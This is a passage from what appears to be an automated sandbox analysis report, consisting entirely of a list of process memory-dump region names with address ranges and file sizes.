                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        100KB

                                                                                                                                                                                                                                                                                                                      • memory/3980-139-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        100KB

                                                                                                                                                                                                                                                                                                                      • memory/3980-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/3980-137-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        152KB

                                                                                                                                                                                                                                                                                                                      • memory/3980-136-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.5MB

                                                                                                                                                                                                                                                                                                                      • memory/3984-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4040-182-0x0000000000400000-0x0000000000896000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4.6MB

                                                                                                                                                                                                                                                                                                                      • memory/4040-176-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                                                      • memory/4040-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4184-410-0x0000000000400000-0x0000000000D41000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        9.3MB

                                                                                                                                                                                                                                                                                                                      • memory/4184-409-0x0000000002E70000-0x0000000003796000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        9.1MB

                                                                                                                                                                                                                                                                                                                      • memory/4184-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4188-275-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4356-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4356-333-0x0000000000970000-0x0000000000971000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4356-346-0x00000000050F0000-0x0000000005166000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        472KB

                                                                                                                                                                                                                                                                                                                      • memory/4372-400-0x00000000005C0000-0x00000000005EF000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        188KB

                                                                                                                                                                                                                                                                                                                      • memory/4372-299-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4372-401-0x0000000000400000-0x0000000000460000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        384KB

                                                                                                                                                                                                                                                                                                                      • memory/4452-290-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4452-292-0x0000000000440000-0x0000000000441000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4452-294-0x0000000000B70000-0x0000000000B71000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4452-297-0x000000001B020000-0x000000001B022000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                                                      • memory/4452-298-0x0000000000C40000-0x0000000000C41000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4452-296-0x0000000000B80000-0x0000000000BA3000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        140KB

                                                                                                                                                                                                                                                                                                                      • memory/4484-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4508-459-0x000001E6941F0000-0x000001E69420B000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        108KB

                                                                                                                                                                                                                                                                                                                      • memory/4508-329-0x00007FF63F034060-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4508-331-0x000001E692630000-0x000001E69267E000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        312KB

                                                                                                                                                                                                                                                                                                                      • memory/4508-337-0x000001E692940000-0x000001E6929B4000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        464KB

                                                                                                                                                                                                                                                                                                                      • memory/4508-460-0x000001E695000000-0x000001E695106000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                                                                                                      • memory/4540-287-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4564-399-0x0000000000400000-0x00000000004DE000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        888KB

                                                                                                                                                                                                                                                                                                                      • memory/4564-398-0x00000000004E0000-0x000000000062A000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                                                                                      • memory/4564-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4608-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4608-326-0x00000000004D0000-0x000000000057E000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        696KB

                                                                                                                                                                                                                                                                                                                      • memory/4660-313-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4668-405-0x0000018B43BE0000-0x0000018B43C50000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                                                      • memory/4668-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4668-406-0x0000018B440B0000-0x0000018B44181000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        836KB

                                                                                                                                                                                                                                                                                                                      • memory/4712-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4728-347-0x0000000002220000-0x000000000223B000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        108KB

                                                                                                                                                                                                                                                                                                                      • memory/4728-348-0x0000000004CD0000-0x0000000004CD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4728-343-0x00000000005E0000-0x000000000072A000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                                                                                      • memory/4728-368-0x0000000004CD3000-0x0000000004CD4000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4728-365-0x0000000004CD2000-0x0000000004CD3000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4728-344-0x0000000000400000-0x00000000004D7000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        860KB

                                                                                                                                                                                                                                                                                                                      • memory/4728-361-0x0000000002490000-0x00000000024AA000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        104KB

                                                                                                                                                                                                                                                                                                                      • memory/4728-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4728-379-0x0000000004CD4000-0x0000000004CD6000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                                                      • memory/4744-325-0x0000000000402E1A-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4744-321-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                                                      • memory/4752-288-0x0000000005140000-0x0000000005141000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4752-282-0x00000000049E0000-0x00000000049E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4752-277-0x0000000004A10000-0x0000000004A11000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4752-283-0x0000000004C30000-0x0000000004C31000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4752-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4752-271-0x0000000000210000-0x0000000000211000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4788-312-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        120KB

                                                                                                                                                                                                                                                                                                                      • memory/4788-315-0x000000000041884A-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4788-354-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4788-350-0x0000000004DE0000-0x00000000053E6000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        6.0MB

                                                                                                                                                                                                                                                                                                                      • memory/4800-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4800-249-0x00000141E8500000-0x00000141E8501000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4920-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4928-252-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4952-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4952-403-0x0000000000400000-0x00000000004AA000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        680KB

                                                                                                                                                                                                                                                                                                                      • memory/4952-402-0x0000000002150000-0x00000000021ED000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        628KB

                                                                                                                                                                                                                                                                                                                      • memory/4960-285-0x00000000054A0000-0x00000000054A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4960-255-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4960-273-0x0000000000A80000-0x0000000000A81000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/4980-257-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5008-323-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/5008-342-0x0000000004D60000-0x0000000004D6D000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        52KB

                                                                                                                                                                                                                                                                                                                      • memory/5008-269-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/5008-259-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5060-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5144-404-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5168-407-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5324-408-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5456-415-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5456-455-0x000002472A460000-0x000002472A52F000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        828KB

                                                                                                                                                                                                                                                                                                                      • memory/5456-454-0x0000024729F90000-0x0000024729FFE000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        440KB

                                                                                                                                                                                                                                                                                                                      • memory/5468-413-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5512-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5536-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5600-420-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5656-425-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5776-431-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5908-434-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5976-444-0x00000000052B0000-0x00000000052B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/5976-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/6044-439-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/6112-445-0x0000000000000000-mapping.dmp